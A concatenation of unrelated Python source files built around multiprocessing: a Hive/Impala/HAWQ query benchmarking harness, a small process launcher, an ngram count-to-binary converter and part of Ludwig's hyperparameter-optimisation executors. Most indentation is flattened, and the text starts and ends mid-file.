raise TimeoutException()
if rec['error']:
raise Exception('Query failed')
class SqlBatchTest(SqlTest):
def __init__(self, test_config, default_configs=_default_configs):
super(SqlBatchTest, self).__init__(test_config, default_configs=default_configs)
def run_test(self):
config = self.test_config
config['root_test_uuid'] = config['test_uuid']
child_messages = {}
# Create random query list for each stream
config['query_filenames'] = sorted(glob_file_list(config['query_filespec']))
random.seed(config['random_seed'])
stream_configs = []
queries_per_stream = config.get('queries_per_stream',0)
for stream_id in range(0, config.get('stream_count',1)):
stream_config = config.copy()
stream_config['stream_id'] = stream_id
if config['random_seed'] != 0:
random.shuffle(stream_config['query_filenames'])
if queries_per_stream > 0:
stream_config['query_filenames'] = stream_config['query_filenames'][0:queries_per_stream]
logging.info('Queries for stream %d: %s' % (stream_config['stream_id'], ' '.join(stream_config['query_filenames'])))
stream_configs.append(stream_config)
self.hadoop_authenticate()
self.configure_environment()
with self.metrics_collector_context():
self.start_metrics()
error_count = 0
success_count = 0
t0 = datetime.datetime.utcnow()
# Start stream processes
active_streams = {}
queue = multiprocessing.Queue()
for stream_config in stream_configs:
stream_config = stream_config.copy()
del stream_config['_status_node'] # We can't send this between processes.
stream_id = stream_config['stream_id']
process = multiprocessing.Process(target=run_query_stream, args=(queue, stream_config))
process.start()
active_streams[stream_id] = {'process': process, 'stream_config': stream_config}
# Monitor stream processes
while len(active_streams.keys()) > 0:
# Update status
status_text = 'successful queries=%d, errors=%d' % (success_count, error_count)
status_node = config['_status_node']
status_node.set_status(status_text, destroy_children=False)
# Handle any completed stream processes
                for stream_id in list(active_streams.keys()):
process = active_streams[stream_id]['process']
if not process.is_alive():
logging.info('Stream %d is done' % stream_id)
process.join()
return_code = process.exitcode
if return_code != 0:
                            # An uncaught exception has occurred. Normal query failures are not handled here.
logging.error('Stream %d returned error %d' % (stream_id, return_code))
error_count += 1
del active_streams[stream_id]
# Process messages (individual query results, stream results) from stream processes
try:
while True:
# Wait up to 1 second for next message in queue.
message = queue.get(True, 1)
# Create a new test_uuid for this child record.
# The query batch test_uuid is in root_test_uuid.
message['record_uuid'] = str(uuid.uuid4())
message['test_uuid'] = message['record_uuid']
# Record individual message to a file for immediate visibility.
record_result(message, message['result_filename'])
# Also add to child_messages key of the query batch record.
record_type = message['record_type']
if record_type not in child_messages:
child_messages[record_type] = []
child_messages[record_type].append(message)
# Count successful and error queries.
if message['record_type'] == 'query_result':
if message['error']:
error_count += 1
else:
success_count += 1
except Queue.Empty:
pass
except KeyboardInterrupt:
raise
except:
logging.error('Unexpected error: %s' % sys.exc_info()[0])
t1 = datetime.datetime.utcnow()
td = t1 - t0
logging.info('All streams are done')
rec = config.copy()
rec['record_uuid'] = rec['test_uuid']
rec['record_type'] = 'query_batch_summary'
rec['utc_begin'] = t0.isoformat()
rec['utc_end'] = t1.isoformat()
rec['elapsed_sec'] = time_duration_to_seconds(td)
rec['error'] = (error_count > 0)
rec['child_messages'] = child_messages
record_result(rec, rec['result_filename'])
logging.info('successful queries=%d, errors=%d' % (success_count, error_count))
if rec['error']:
raise Exception('Query batch failed')
def run_query_stream(queue, stream_config):
stream_id = stream_config['stream_id']
logging.info('%d: Stream begin' % stream_id)
t0 = datetime.datetime.utcnow()
stream_error = False
for query_index, query_filename in enumerate(stream_config['query_filenames']):
logging.info('%d: query_index=%d, query_filename=%s' % (stream_id, query_index, query_filename))
query_config = stream_config.copy()
del query_config['query_filenames']
query_config['query_index'] = query_index
query_config['query_filename'] = query_filename
run_query(query_config)
if query_config['error']: stream_error = True
# Place query_result record in queue. These will be collected and recorded by SqlBatchTest.run_test().
queue.put(query_config)
t1 = datetime.datetime.utcnow()
td = t1 - t0
rec = stream_config.copy()
rec['record_type'] = 'query_stream_summary'
rec['utc_begin'] = t0.isoformat()
rec['utc_end'] = t1.isoformat()
rec['elapsed_sec'] = time_duration_to_seconds(td)
rec['error'] = stream_error
# Place query_stream_summary record in queue. These will be collected and recorded by SqlBatchTest.run_test().
queue.put(rec)
logging.info('%d: Stream end' % stream_id)
def run_query(query_config):
rec = query_config
print_output = rec.get('print_output',True)
stream_id = rec.get('stream_id', 0)
rec['db_name'] = rec['db_name'] % rec
if rec.get('kill_all_yarn_jobs_before_each_query',False):
kill_all_yarn_jobs()
rec['query_filename_contents'] = read_file_to_string(rec['query_filename'])
shell = False
db_type = rec['db_type']
# Build query command.
if db_type == 'hawq':
cmd = []
cmd.extend(['psql'])
cmd.extend(['-v', 'ON_ERROR_STOP=1'])
cmd.extend(['-d', rec['db_name']])
cmd.extend(['-tAf', rec['query_filename']])
elif db_type == 'hive':
if not 'hiveconf:hive.tez.java.opts' in rec and 'java_opts_xmx_ratio' in rec and 'hiveconf:hive.tez.container.size' in rec:
rec['hiveconf:hive.tez.java.opts'] = '-Xmx%dm' % (rec['hiveconf:hive.tez.container.size'] * rec['java_opts_xmx_ratio'])
hiveconf = []
for k,v in rec.items():
prop = regex_first_group('^hiveconf:(.*)', k)
if prop:
hiveconf.extend(['--hiveconf','"%s=%s"' % (prop, v)])
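        # e.g. (hypothetical) a config key 'hiveconf:hive.tez.container.size' with
        # value 4096 is passed as: --hiveconf "hive.tez.container.size=4096"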
cmd = []
cmd.extend(['hive'])
cmd.extend(['--database', rec['db_name']])
cmd.extend(['-f', rec['query_filename']])
if 'hive_init_file' in rec:
cmd.extend(['-i', rec['hive_init_file']])
# Record contents of file in result.
rec['hive_init_file_contents'] = read_file_to_string(rec['hive_init_file'])
cmd.extend(hiveconf)
elif db_type == 'impala':
cmd = []
cmd.extend(['impala-shell'])
cmd.extend(['--impalad', '%s:%d' % (rec.get('impalad_host','localhost'), rec.get('impalad_port',21000))])
cmd.extend(['--database', rec['db_name']])
cmd.extend(['-f', rec['query_filename']])
cmd.extend(['-B']) # turn off pretty printing
cmd.extend(['-o', '/dev/null'])
if rec.get('profile_query'):
cmd.extend(['--show_profiles'])
else:
        raise ValueError('Unknown db_type')
logging.info('%d: # %s' % (stream_id, ' '.join(cmd)))
rec['query_command'] = cmd
t0 = datetime.datetime.utcnow()
# Run query.
return_code, output, errors = system_command(cmd,
print_command=False,
print_output=print_output,
timeout=rec.get('command_timeout_sec',None),
raise_on_error=False,
shell=shell)
t1 = datetime.datetime.utcnow()
td = t1 - t0
rec['utc_begin'] = t0.isoformat()
rec['utc_end'] = t1.isoformat()
rec['elapsed_sec'] = time_duration_to_seconds(td)
rec['error'] = (return_code != 0)
rec['exit_code'] = return_code
rec['command_timed_out'] = (return_code == -1)
rec['output'] = output
rec['errors'] = errors
rec['record_type'] = 'query_result'
# Parse query output to determine elapsed time and rows returned.
if db_type == 'hive':
rec['application_id'] = regex_first_group('\\(Executing on YARN cluster with App id (application_.*)\\)$',
errors, return_on_no_match=None, search=True, flags=re.MULTILINE)
        # Extract actual query duration from stderr text. Note that we must find the last occurrence of 'Time taken'.
query_elapsed_sec = regex_first_group(
'Time taken: ([0-9.]+) seconds',
errors, return_on_no_match='nan', search=True, flags=re.MULTILINE, match_last=True)
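        # Illustrative Hive stderr line being matched (numbers hypothetical):
        #   Time taken: 12.345 seconds, Fetched: 10 row(s)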
if query_elapsed_sec == 'nan':
            logging.warning('Time taken not returned by command.')
rec['error'] = True
rec['query_elapsed_sec'] = float(query_elapsed_sec)
rec['non_query_elapsed_sec'] = rec['elapsed_sec'] - rec['query_elapsed_sec']
# Extract row count from stderr text. Note that some queries will not report fetched rows.
query_rows_returned = regex_first_group(
'Fetched: ([0-9]+) row',
errors, return_on_no_match='0', search=True, flags=re.MULTILINE)
rec['query_rows_returned'] = int(query_rows_returned)
logging.info('error=%d, query_elapsed_sec=%f, non_query_elapsed_sec=%f, query_rows_returned=%d' %
(rec['error'], rec['query_elapsed_sec'], rec['non_query_elapsed_sec'], rec['query_rows_returned']))
elif db_type == 'impala':
# Extract actual query duration from stderr text.
# Fetched 100 row(s) in 0.98s
query_elapsed_sec = regex_first_group(
'Fetched [0-9]+ row\\(s\\) in ([0-9.]+)s',
errors, return_on_no_match='nan', search=True, flags=re.MULTILINE, match_last=True)
if query_elapsed_sec == 'nan':
            logging.warning('Time taken not returned by command.')
rec['error'] = True
rec['query_elapsed_sec'] = float(query_elapsed_sec)
rec['non_query_elapsed_sec'] = rec['elapsed_sec'] - rec['query_elapsed_sec']
# Extract row count from stderr text. Note that some queries will not report fetched rows.
query_rows_returned = regex_first_group(
'Fetched ([0-9]+) row\\(s\\)',
errors, return_on_no_match='0', search=True, flags=re.MULTILINE)
rec['query_rows_returned'] = int(query_rows_returned)
logging.info('error=%d, query_elapsed_sec=%f, non_query_elapsed_sec=%f, query_rows_returned=%d' %
(rec['error'], rec['query_elapsed_sec'], rec['non_query_elapsed_sec'], rec['query_rows_returned']))
else:
rec['query_elapsed_sec'] = rec['elapsed_sec']
rec['non_query_elapsed_sec'] = 0.0
        rec['query_rows_returned'] = float('nan')  # numpy is not imported in this module
# Handle errors.
if rec['error']:
logging.info('%d: return_code=%d' % (stream_id, return_code))
if not print_output:
logging.info('%d: %s' % (stream_id, output))
if db_type == 'hive':
# Kill YARN application
if rec['application_id']:
kill_yarn_job(rec['application_id'])
if errors != '':
if not print_output:
logging.info('%d: %s' % (stream_id, errors))
if not rec['error']:
logging.info('%d: %s: %0.3f seconds' % (stream_id, rec['query_filename'], rec['elapsed_sec']))
return rec
|
daemon.py
|
#!/usr/bin/env python3
import ast
import multiprocessing
from spider.db_agent.db_process import db_process_agent
from spider.ui_agent.show_process import ui_neo4j_agent
from spider.util.conf import db_agent
from spider.util.conf import neo4j_timer
def main():
record = []
process = multiprocessing.Process(target=db_process_agent, args=(ast.literal_eval(db_agent),))
process.start()
record.append(process)
process = multiprocessing.Process(target=ui_neo4j_agent, args=(int(neo4j_timer),))
process.start()
record.append(process)
for process in record:
process.join()
if __name__ == '__main__':
main()
|
counts2bin.py
|
import argparse
from scipy.sparse import dok_matrix, csr_matrix
import numpy as np
import random
import struct
import sys
from multiprocessing import Process, Queue
from Queue import Empty
import ioutils
def worker(proc_num, queue, out_dir, count_dir):
print "counts2bin"
while True:
try:
year = queue.get(block=False)
except Empty:
break
print proc_num, "Processing counts pairs for year", year
bin_file = open(out_dir + str(year) + "-pair_counts.shuf.bin", 'wb')
with open(count_dir + str(year) + "-pair_counts.shuf", 'r') as f:
counts_num = 0
for line in f:
if counts_num % 1000 == 0:
sys.stdout.write("\r" + str(counts_num/1000**2) + "M tokens processed.")
counts_num += 1
word, context, count = line.strip().split()
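                # Pack each 'word_id context_id count' line as two native ints plus
                # a double ('iid'), typically 16 bytes per record.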
b = struct.pack('iid', int(word), int(context), float(count))
bin_file.write(b)
print proc_num, "number of counts: " + str(counts_num)
bin_file.close()
print proc_num, "Finished"
def run_parallel(num_procs, out_dir, count_dir, years):
queue = Queue()
for year in years:
queue.put(year)
procs = [Process(target=worker, args=[i, queue, out_dir, count_dir]) for i in range(num_procs)]
for p in procs:
p.start()
for p in procs:
p.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Computes various frequency statistics.")
parser.add_argument("out_dir", help="output directory for bin count ngrams pairs")
parser.add_argument("count_dir", help="directory contains count ngrams pairs -pair_counts.shuf")
parser.add_argument("--workers", type=int, default=10)
parser.add_argument("--start-year", type=int, help="start year (inclusive)", default=1800)
parser.add_argument("--end-year", type=int, help="end year (inclusive)", default=2000)
parser.add_argument("--year-inc", type=int, help="end year (inclusive)", default=1)
args = parser.parse_args()
years = range(args.start_year, args.end_year + 1, args.year_inc)
ioutils.mkdir(args.out_dir)
run_parallel(args.workers, args.out_dir + "/", args.count_dir + "/", years)
|
execution.py
|
import datetime
import logging
import os
import uuid
import copy
import json
import multiprocessing
import signal
import shutil
import threading
import time
import warnings
from abc import ABC, abstractmethod
from pathlib import Path
from typing import Union, Optional
from ludwig.api import LudwigModel
from ludwig.backend import RAY, initialize_backend
from ludwig.callbacks import Callback
from ludwig.constants import *
from ludwig.hyperopt.results import TrialResults, HyperoptResults, RayTuneResults
from ludwig.hyperopt.sampling import HyperoptSampler, RayTuneSampler, logger
from ludwig.hyperopt.utils import load_json_values
from ludwig.modules.metric_modules import get_best_function
from ludwig.utils.data_utils import NumpyEncoder
from ludwig.utils.defaults import default_random_seed
from ludwig.utils.misc_utils import (get_available_gpu_memory,
get_from_registry,
hash_dict)
from ludwig.utils.fs_utils import has_remote_protocol, file_lock
from ludwig.utils.tf_utils import get_available_gpus_cuda_string
try:
import ray
from ray.util.queue import Queue as RayQueue
from ray import tune
from ray.tune import register_trainable
from ray.tune.suggest import BasicVariantGenerator, ConcurrencyLimiter
from ray.tune.syncer import get_cloud_sync_client
from ray.tune.utils import wait_for_gpu
from ray.tune.utils.placement_groups import PlacementGroupFactory
from ludwig.backend.ray import RayBackend
except ImportError:
ray = None
get_horovod_kwargs = None
class RayBackend:
pass
class RayRemoteTrainer:
pass
# TODO: refactor this into an interface
def _is_ray_backend(backend) -> bool:
if isinstance(backend, str):
return backend == RAY
return isinstance(backend, RayBackend)
def _get_relative_checkpoints_dir_parts(path: Path):
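    # e.g. (illustrative): Path('/tmp/results/exp_run/trial_0') -> ('exp_run', 'trial_0')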
return path.parts[-2:]
class HyperoptExecutor(ABC):
def __init__(self, hyperopt_sampler: Union[dict, HyperoptSampler],
output_feature: str, metric: str, split: str) -> None:
self.hyperopt_sampler = hyperopt_sampler
self.output_feature = output_feature
self.metric = metric
self.split = split
def _has_metric(self, stats, split):
if not stats:
return False
if split is not None:
if split not in stats:
return False
stats = stats[split]
if self.output_feature not in stats:
return False
stats = stats[self.output_feature]
if self.metric not in stats:
return False
stats = stats[self.metric]
return len(stats) > 0
def _has_eval_metric(self, stats):
if stats is None:
return False
if self.output_feature not in stats:
return False
stats = stats[self.output_feature]
for metric_part in self.metric.split('.'):
if not isinstance(stats, dict) or metric_part not in stats:
return False
stats = stats[metric_part]
return isinstance(stats, float)
def get_metric_score(self, train_stats, eval_stats) -> float:
if self._has_metric(train_stats, TEST):
logger.info(
"Returning metric score from training (test) statistics")
return self.get_metric_score_from_train_stats(train_stats, TEST)
elif self._has_eval_metric(eval_stats):
logger.info("Returning metric score from eval statistics. "
"If skip_save_model is True, eval statistics "
"are calculated using the model at the last epoch "
"rather than the model at the epoch with "
"best validation performance")
return self.get_metric_score_from_eval_stats(eval_stats)
elif self._has_metric(train_stats, VALIDATION):
logger.info(
"Returning metric score from training (validation) statistics")
return self.get_metric_score_from_train_stats(train_stats, VALIDATION)
elif self._has_metric(train_stats, TRAINING):
logger.info("Returning metric score from training split statistics, "
"as no test / validation / eval sets were given")
return self.get_metric_score_from_train_stats(train_stats, TRAINING)
else:
raise RuntimeError(
"Unable to obtain metric score from missing training / eval statistics")
def get_metric_score_from_eval_stats(self, eval_stats) -> Union[float, list]:
stats = eval_stats[self.output_feature]
for metric_part in self.metric.split('.'):
if isinstance(stats, dict):
if metric_part in stats:
stats = stats[metric_part]
else:
raise ValueError(
f"Evaluation statistics do not contain "
f"the metric {self.metric}")
else:
raise ValueError(f"Evaluation statistics do not contain "
f"the metric {self.metric}")
if not isinstance(stats, float):
raise ValueError(f"The metric {self.metric} in "
f"evaluation statistics is not "
f"a numerical value: {stats}")
return stats
def get_metric_score_from_train_stats(self, train_stats, select_split=None, returned_split=None) -> float:
select_split = select_split or VALIDATION
returned_split = returned_split or self.split
if not self._has_metric(train_stats, returned_split):
returned_split = select_split
# grab the results of the model with highest validation test performance
train_valiset_stats = train_stats[select_split]
train_evalset_stats = train_stats[returned_split]
validation_field_result = train_valiset_stats[self.output_feature]
best_function = get_best_function(self.metric)
# results of the model with highest validation test performance
epoch_best_vali_metric, best_vali_metric = best_function(
enumerate(validation_field_result[self.metric]),
key=lambda pair: pair[1]
)
best_vali_metric_epoch_eval_metric = train_evalset_stats[
self.output_feature][self.metric][
epoch_best_vali_metric]
return best_vali_metric_epoch_eval_metric
def sort_hyperopt_results(self, hyperopt_results):
return sorted(
hyperopt_results, key=lambda hp_res: hp_res.metric_score,
reverse=self.hyperopt_sampler.goal == MAXIMIZE
)
@abstractmethod
def execute(
self,
config,
dataset=None,
training_set=None,
validation_set=None,
test_set=None,
training_set_metadata=None,
data_format=None,
experiment_name="hyperopt",
model_name="run",
model_load_path=None,
model_resume_path=None,
skip_save_training_description=False,
skip_save_training_statistics=False,
skip_save_model=False,
skip_save_progress=False,
skip_save_log=False,
skip_save_processed_input=True,
skip_save_unprocessed_output=False,
skip_save_predictions=False,
skip_save_eval_stats=False,
output_directory="results",
gpus=None,
gpu_memory_limit=None,
allow_parallel_threads=True,
callbacks=None,
backend=None,
random_seed=default_random_seed,
debug=False,
**kwargs
) -> HyperoptResults:
pass
class SerialExecutor(HyperoptExecutor):
def __init__(
self, hyperopt_sampler: HyperoptSampler,
output_feature: str,
metric: str, split: str, **kwargs
) -> None:
HyperoptExecutor.__init__(self, hyperopt_sampler, output_feature,
metric, split)
def execute(
self,
config,
dataset=None,
training_set=None,
validation_set=None,
test_set=None,
training_set_metadata=None,
data_format=None,
experiment_name="hyperopt",
model_name="run",
# model_load_path=None,
# model_resume_path=None,
skip_save_training_description=False,
skip_save_training_statistics=False,
skip_save_model=False,
skip_save_progress=False,
skip_save_log=False,
skip_save_processed_input=True,
skip_save_unprocessed_output=False,
skip_save_predictions=False,
skip_save_eval_stats=False,
output_directory="results",
gpus=None,
gpu_memory_limit=None,
allow_parallel_threads=True,
callbacks=None,
backend=None,
random_seed=default_random_seed,
debug=False,
**kwargs
) -> HyperoptResults:
trial_results = []
trials = 0
while not self.hyperopt_sampler.finished():
sampled_parameters = self.hyperopt_sampler.sample_batch()
metric_scores = []
for i, parameters in enumerate(sampled_parameters):
modified_config = substitute_parameters(
copy.deepcopy(config), parameters)
trial_id = trials + i
model = LudwigModel(
config=modified_config,
backend=backend,
gpus=gpus,
gpu_memory_limit=gpu_memory_limit,
allow_parallel_threads=allow_parallel_threads,
callbacks=callbacks,
)
eval_stats, train_stats, _, _ = model.experiment(
dataset=dataset,
training_set=training_set,
validation_set=validation_set,
test_set=test_set,
training_set_metadata=training_set_metadata,
data_format=data_format,
experiment_name=f'{experiment_name}_{trial_id}',
model_name=model_name,
# model_load_path=model_load_path,
# model_resume_path=model_resume_path,
eval_split=self.split,
skip_save_training_description=skip_save_training_description,
skip_save_training_statistics=skip_save_training_statistics,
skip_save_model=skip_save_model,
skip_save_progress=skip_save_progress,
skip_save_log=skip_save_log,
skip_save_processed_input=skip_save_processed_input,
skip_save_unprocessed_output=skip_save_unprocessed_output,
skip_save_predictions=skip_save_predictions,
skip_save_eval_stats=skip_save_eval_stats,
output_directory=output_directory,
skip_collect_predictions=True,
skip_collect_overall_stats=False,
random_seed=random_seed,
debug=debug,
)
metric_score = self.get_metric_score(train_stats, eval_stats)
metric_scores.append(metric_score)
trial_results.append(TrialResults(
parameters=parameters,
metric_score=metric_score,
training_stats=train_stats,
eval_stats=eval_stats,
))
trials += len(sampled_parameters)
self.hyperopt_sampler.update_batch(
zip(sampled_parameters, metric_scores))
ordered_trials = self.sort_hyperopt_results(trial_results)
return HyperoptResults(ordered_trials=ordered_trials)
class ParallelExecutor(HyperoptExecutor):
num_workers = 2
epsilon = 0.01
epsilon_memory = 100
TF_REQUIRED_MEMORY_PER_WORKER = 100
def __init__(
self,
hyperopt_sampler: HyperoptSampler,
output_feature: str,
metric: str,
split: str,
num_workers: int = 2,
epsilon: float = 0.01,
**kwargs
) -> None:
HyperoptExecutor.__init__(self, hyperopt_sampler, output_feature,
metric, split)
self.num_workers = num_workers
self.epsilon = epsilon
self.queue = None
@staticmethod
def init_worker():
signal.signal(signal.SIGINT, signal.SIG_IGN)
def _run_experiment(self, hyperopt_dict: dict) -> TrialResults:
parameters = hyperopt_dict["parameters"]
train_stats, eval_stats = run_experiment(**hyperopt_dict)
metric_score = self.get_metric_score(train_stats, eval_stats)
return TrialResults(
parameters=parameters,
metric_score=metric_score,
training_stats=train_stats,
eval_stats=eval_stats,
)
def _run_experiment_gpu(self, hyperopt_dict: dict) -> TrialResults:
gpu_id_meta = self.queue.get()
try:
parameters = hyperopt_dict['parameters']
hyperopt_dict["gpus"] = gpu_id_meta["gpu_id"]
hyperopt_dict["gpu_memory_limit"] = gpu_id_meta["gpu_memory_limit"]
train_stats, eval_stats = run_experiment(**hyperopt_dict)
metric_score = self.get_metric_score(train_stats, eval_stats)
finally:
self.queue.put(gpu_id_meta)
return TrialResults(
parameters=parameters,
metric_score=metric_score,
training_stats=train_stats,
eval_stats=eval_stats,
)
def execute(
self,
config,
dataset=None,
training_set=None,
validation_set=None,
test_set=None,
training_set_metadata=None,
data_format=None,
experiment_name="hyperopt",
model_name="run",
# model_load_path=None,
# model_resume_path=None,
skip_save_training_description=False,
skip_save_training_statistics=False,
skip_save_model=False,
skip_save_progress=False,
skip_save_log=False,
skip_save_processed_input=True,
skip_save_unprocessed_output=False,
skip_save_predictions=False,
skip_save_eval_stats=False,
output_directory="results",
gpus=None,
gpu_memory_limit=None,
allow_parallel_threads=True,
callbacks=None,
backend=None,
random_seed=default_random_seed,
debug=False,
**kwargs
) -> HyperoptResults:
ctx = multiprocessing.get_context('spawn')
if gpus is None:
gpus = get_available_gpus_cuda_string()
if gpus is not None:
num_available_cpus = ctx.cpu_count()
if self.num_workers > num_available_cpus:
logger.warning(
"WARNING: num_workers={}, num_available_cpus={}. "
"To avoid bottlenecks setting num workers to be less "
"or equal to number of available cpus is suggested".format(
self.num_workers, num_available_cpus
)
)
if isinstance(gpus, int):
gpus = str(gpus)
gpus = gpus.strip()
gpu_ids = gpus.split(",")
num_gpus = len(gpu_ids)
available_gpu_memory_list = get_available_gpu_memory()
gpu_ids_meta = {}
if num_gpus < self.num_workers:
fraction = (num_gpus / self.num_workers) - self.epsilon
for gpu_id in gpu_ids:
available_gpu_memory = available_gpu_memory_list[
int(gpu_id)]
required_gpu_memory = fraction * available_gpu_memory
if gpu_memory_limit is None:
logger.warning(
'WARNING: Setting gpu_memory_limit to {} '
                            'as the available gpus are {} '
'and the num of workers is {} '
'and the available gpu memory for gpu_id '
'{} is {}'.format(
required_gpu_memory, num_gpus,
self.num_workers,
gpu_id, available_gpu_memory)
)
new_gpu_memory_limit = required_gpu_memory - \
(
self.TF_REQUIRED_MEMORY_PER_WORKER * self.num_workers)
else:
new_gpu_memory_limit = gpu_memory_limit
if new_gpu_memory_limit > available_gpu_memory:
logger.warning(
'WARNING: Setting gpu_memory_limit to available gpu '
'memory {} minus an epsilon as the value specified is greater than '
'available gpu memory.'.format(
available_gpu_memory)
)
new_gpu_memory_limit = available_gpu_memory - self.epsilon_memory
if required_gpu_memory < new_gpu_memory_limit:
if required_gpu_memory > 0.5 * available_gpu_memory:
if available_gpu_memory != new_gpu_memory_limit:
logger.warning(
'WARNING: Setting gpu_memory_limit to available gpu '
'memory {} minus an epsilon as the gpus would be underutilized for '
'the parallel processes otherwise'.format(
available_gpu_memory)
)
new_gpu_memory_limit = available_gpu_memory - self.epsilon_memory
else:
logger.warning(
'WARNING: Setting gpu_memory_limit to {} '
'as the available gpus are {} and the num of workers '
'are {} and the available gpu memory for gpu_id '
'{} is {}'.format(
required_gpu_memory, num_gpus,
self.num_workers,
gpu_id, available_gpu_memory)
)
new_gpu_memory_limit = required_gpu_memory
else:
logger.warning(
'WARNING: gpu_memory_limit could be increased to {} '
'as the available gpus are {} and the num of workers '
'are {} and the available gpu memory for gpu_id '
'{} is {}'.format(
required_gpu_memory, num_gpus,
self.num_workers,
gpu_id, available_gpu_memory)
)
process_per_gpu = int(
available_gpu_memory / new_gpu_memory_limit)
gpu_ids_meta[gpu_id] = {
"gpu_memory_limit": new_gpu_memory_limit,
"process_per_gpu": process_per_gpu}
else:
for gpu_id in gpu_ids:
gpu_ids_meta[gpu_id] = {
"gpu_memory_limit": gpu_memory_limit,
"process_per_gpu": 1}
manager = ctx.Manager()
self.queue = manager.Queue()
for gpu_id in gpu_ids:
process_per_gpu = gpu_ids_meta[gpu_id]["process_per_gpu"]
gpu_memory_limit = gpu_ids_meta[gpu_id]["gpu_memory_limit"]
for _ in range(process_per_gpu):
gpu_id_meta = {"gpu_id": gpu_id,
"gpu_memory_limit": gpu_memory_limit}
self.queue.put(gpu_id_meta)
pool = ctx.Pool(self.num_workers,
ParallelExecutor.init_worker)
try:
trial_results = []
trials = 0
while not self.hyperopt_sampler.finished():
sampled_parameters = self.hyperopt_sampler.sample_batch()
hyperopt_parameters = []
for i, parameters in enumerate(sampled_parameters):
modified_config = substitute_parameters(
copy.deepcopy(config), parameters)
trial_id = trials + i
hyperopt_parameters.append(
dict(
parameters=parameters,
config=modified_config,
eval_split=self.split,
dataset=dataset,
training_set=training_set,
validation_set=validation_set,
test_set=test_set,
training_set_metadata=training_set_metadata,
data_format=data_format,
experiment_name=f'{experiment_name}_{trial_id}',
model_name=model_name,
# model_load_path=model_load_path,
# model_resume_path=model_resume_path,
skip_save_training_description=skip_save_training_description,
skip_save_training_statistics=skip_save_training_statistics,
skip_save_model=skip_save_model,
skip_save_progress=skip_save_progress,
skip_save_log=skip_save_log,
# needed because of concurrent HDF5 writes
skip_save_processed_input=True,
skip_save_unprocessed_output=skip_save_unprocessed_output,
skip_save_predictions=skip_save_predictions,
skip_save_eval_stats=skip_save_eval_stats,
output_directory=output_directory,
gpus=gpus,
gpu_memory_limit=gpu_memory_limit,
allow_parallel_threads=allow_parallel_threads,
callbacks=callbacks,
backend=backend,
random_seed=random_seed,
debug=debug,
)
)
trials += len(sampled_parameters)
if gpus is not None:
batch_results = pool.map(self._run_experiment_gpu,
hyperopt_parameters)
else:
batch_results = pool.map(self._run_experiment,
hyperopt_parameters)
self.hyperopt_sampler.update_batch(
(result.parameters, result.metric_score)
for result in batch_results
)
trial_results.extend(batch_results)
finally:
pool.close()
pool.join()
ordered_trials = self.sort_hyperopt_results(trial_results)
return HyperoptResults(ordered_trials=ordered_trials)
class FiberExecutor(HyperoptExecutor):
num_workers = 2
fiber_backend = "local"
def __init__(
self,
hyperopt_sampler: HyperoptSampler,
output_feature: str,
metric: str,
split: str,
num_workers: int = 2,
num_cpus_per_worker: int = -1,
num_gpus_per_worker: int = -1,
fiber_backend: str = "local",
**kwargs
) -> None:
import fiber
HyperoptExecutor.__init__(self, hyperopt_sampler, output_feature,
metric, split)
fiber.init(backend=fiber_backend)
self.fiber_meta = fiber.meta
self.num_cpus_per_worker = num_cpus_per_worker
self.num_gpus_per_worker = num_gpus_per_worker
self.resource_limits = {}
if num_cpus_per_worker != -1:
self.resource_limits["cpu"] = num_cpus_per_worker
if num_gpus_per_worker != -1:
self.resource_limits["gpu"] = num_gpus_per_worker
self.num_workers = num_workers
self.pool = fiber.Pool(num_workers)
def execute(
self,
config,
dataset=None,
training_set=None,
validation_set=None,
test_set=None,
training_set_metadata=None,
data_format=None,
experiment_name="hyperopt",
model_name="run",
# model_load_path=None,
# model_resume_path=None,
skip_save_training_description=False,
skip_save_training_statistics=False,
skip_save_model=False,
skip_save_progress=False,
skip_save_log=False,
skip_save_processed_input=True,
skip_save_unprocessed_output=False,
skip_save_predictions=False,
skip_save_eval_stats=False,
output_directory="results",
gpus=None,
gpu_memory_limit=None,
allow_parallel_threads=True,
callbacks=None,
backend=None,
random_seed=default_random_seed,
debug=False,
**kwargs
) -> HyperoptResults:
experiment_kwargs = dict(
dataset=dataset,
training_set=training_set,
validation_set=validation_set,
test_set=test_set,
training_set_metadata=training_set_metadata,
data_format=data_format,
model_name=model_name,
# model_load_path=model_load_path,
# model_resume_path=model_resume_path,
eval_split=self.split,
skip_save_training_description=skip_save_training_description,
skip_save_training_statistics=skip_save_training_statistics,
skip_save_model=skip_save_model,
skip_save_progress=skip_save_progress,
skip_save_log=skip_save_log,
skip_save_processed_input=skip_save_processed_input,
skip_save_unprocessed_output=skip_save_unprocessed_output,
skip_save_predictions=skip_save_predictions,
skip_save_eval_stats=skip_save_eval_stats,
output_directory=output_directory,
gpus=gpus,
gpu_memory_limit=gpu_memory_limit,
allow_parallel_threads=allow_parallel_threads,
callbacks=callbacks,
backend=backend,
random_seed=random_seed,
debug=debug,
)
        experiment_fn = _run_experiment_unary
        if self.resource_limits:
            experiment_fn = self.fiber_meta(**self.resource_limits)(
                experiment_fn)
trial_results = []
trials = 0
while not self.hyperopt_sampler.finished():
sampled_parameters = self.hyperopt_sampler.sample_batch()
metric_scores = []
stats_batch = self.pool.map(
                experiment_fn,
[
{
'config': substitute_parameters(
copy.deepcopy(config), parameters),
'parameters': parameters,
'experiment_name': f'{experiment_name}_{trials + i}',
**experiment_kwargs
}
for i, parameters in enumerate(sampled_parameters)
],
)
trials += len(sampled_parameters)
for stats, parameters in zip(stats_batch, sampled_parameters):
train_stats, eval_stats = stats
metric_score = self.get_metric_score(train_stats, eval_stats)
metric_scores.append(metric_score)
trial_results.append(TrialResults(
parameters=parameters,
metric_score=metric_score,
training_stats=train_stats,
eval_stats=eval_stats,
))
self.hyperopt_sampler.update_batch(
zip(sampled_parameters, metric_scores))
ordered_trials = self.sort_hyperopt_results(trial_results)
return HyperoptResults(ordered_trials=ordered_trials)
class RayTuneExecutor(HyperoptExecutor):
def __init__(
self,
hyperopt_sampler,
output_feature: str,
metric: str,
split: str,
cpu_resources_per_trial: int = None,
gpu_resources_per_trial: int = None,
kubernetes_namespace: str = None,
time_budget_s: Union[int, float, datetime.timedelta] = None,
max_concurrent_trials: Optional[int] = None,
**kwargs
) -> None:
if ray is None:
            raise ImportError('ray module is not installed. To install it, '
                              'try running: pip install ray')
if not isinstance(hyperopt_sampler, RayTuneSampler):
raise ValueError('Sampler {} is not compatible with RayTuneExecutor, '
'please use the RayTuneSampler'.format(
hyperopt_sampler)
)
HyperoptExecutor.__init__(self, hyperopt_sampler, output_feature,
metric, split)
if not ray.is_initialized():
try:
